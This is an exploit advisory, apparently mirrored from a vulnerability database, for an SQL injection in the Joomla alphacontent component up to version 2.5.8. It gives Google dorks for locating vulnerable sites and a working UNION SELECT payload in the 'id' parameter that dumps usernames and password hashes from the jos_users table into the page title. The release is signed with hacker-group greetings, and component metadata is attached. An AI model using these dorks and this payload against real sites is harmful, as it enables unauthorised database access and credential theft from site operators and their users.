Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability

🗓️ 26 Mar 2008 00:00:00Reported by RootType

Joomla Component alphacontent <= 2.5.8 SQL Injection Vulnerabilit


                                                ##########################################
#
#&nbsp;[&nbsp;Joomla&nbsp;Component&nbsp;com_alphacontent&nbsp;SQL&nbsp;Injection&nbsp;]
#
##########################################
[~]&nbsp;Vulnerability&nbsp;found&nbsp;by:&nbsp;cO2&nbsp;[&nbsp;Algeria&nbsp;Security&nbsp;Crew&nbsp;]
[~]&nbsp;Contact:&nbsp;c02[at]hotmail.de
[~]&nbsp;Website:&nbsp;http://www.dzw0rm.ch
[~]&nbsp;Greetings:&nbsp;to&nbsp;all&nbsp;hackers&nbsp;DZ
##########################################
[~]&nbsp;ScriptName&nbsp;:&nbsp;'Joomla'
[~]&nbsp;ModuleName&nbsp;:&nbsp;'AlphaContent'
[~]&nbsp;&nbsp;Version()&nbsp;:&nbsp;'2.5.8&nbsp;'
###########################################
#
#&nbsp;DORK&nbsp;1&nbsp;:&nbsp;&nbsp;inurl:&nbsp;&quot;com_alphacontent&quot;
#
#&nbsp;DORK&nbsp;2&nbsp;:&nbsp;&quot;AlphaContent&nbsp;2.5.8&nbsp;&amp;copy;&nbsp;2005-2008&nbsp;-&nbsp;visualclinic.fr&quot;
#
###########################################
[+]Exploit&nbsp;:
&nbsp;
index.php?option=com_alphacontent&amp;section=6&amp;cat=15&amp;task=view&amp;id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
###########################################
[+]&nbsp;:&nbsp;you&nbsp;can&nbsp;see&nbsp;the&nbsp;password&nbsp;in&nbsp;'Title'
###########################################

side&nbsp;note:
&nbsp;&nbsp;&lt;name&gt;alphacontent&lt;/name&gt;
&nbsp;&nbsp;&lt;creationDate&gt;25&nbsp;Jul&nbsp;2007&lt;/creationDate&gt;
&nbsp;&nbsp;&lt;author&gt;Bernard&nbsp;Gilly&lt;/author&gt;
&nbsp;&nbsp;&lt;copyright&gt;This&nbsp;component&nbsp;is&nbsp;released&nbsp;under&nbsp;the&nbsp;GNU/GPL&nbsp;License.&lt;/copyright&gt;
&nbsp;&nbsp;&lt;authorEmail&gt;[email protected]&lt;/authorEmail&gt;

&nbsp;&nbsp;&lt;authorUrl&gt;www.visualclinic.fr&lt;/authorUrl&gt;
&nbsp;&nbsp;&lt;version&gt;2.5.8&lt;/version&gt;
&nbsp;&nbsp;&lt;description&gt;Directory&nbsp;component&nbsp;with&nbsp;alphabetical&nbsp;indexes&nbsp;for&nbsp;Joomla's&nbsp;Content&lt;/description&gt;

&nbsp;&nbsp;&lt;name&gt;alphacontent&lt;/name&gt;
&nbsp;&nbsp;&lt;creationDate&gt;16&nbsp;Sept&nbsp;2006&lt;/creationDate&gt;
&nbsp;&nbsp;&lt;author&gt;Bernard&nbsp;Gilly&lt;/author&gt;
&nbsp;&nbsp;&lt;copyright&gt;This&nbsp;component&nbsp;is&nbsp;released&nbsp;under&nbsp;the&nbsp;GNU/GPL&nbsp;License.&lt;/copyright&gt;
&nbsp;&nbsp;&lt;authorEmail&gt;[email protected]&lt;/authorEmail&gt;

&nbsp;&nbsp;&lt;authorUrl&gt;www.visualclinic.fr&lt;/authorUrl&gt;
&nbsp;&nbsp;&lt;version&gt;2.5.4&lt;/version&gt;
&nbsp;&nbsp;&lt;description&gt;Directory&nbsp;component&nbsp;and&nbsp;alphabetical&nbsp;indexes&nbsp;for&nbsp;Mambo/Joomla's&nbsp;Content&lt;/description&gt;

26 Mar 2008 00:00Current

7.1High risk

Vulners AI Score7.1

Joomla Component alphacontent &lt;= 2.5.8 (id) SQL Injection Vulnerability

Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability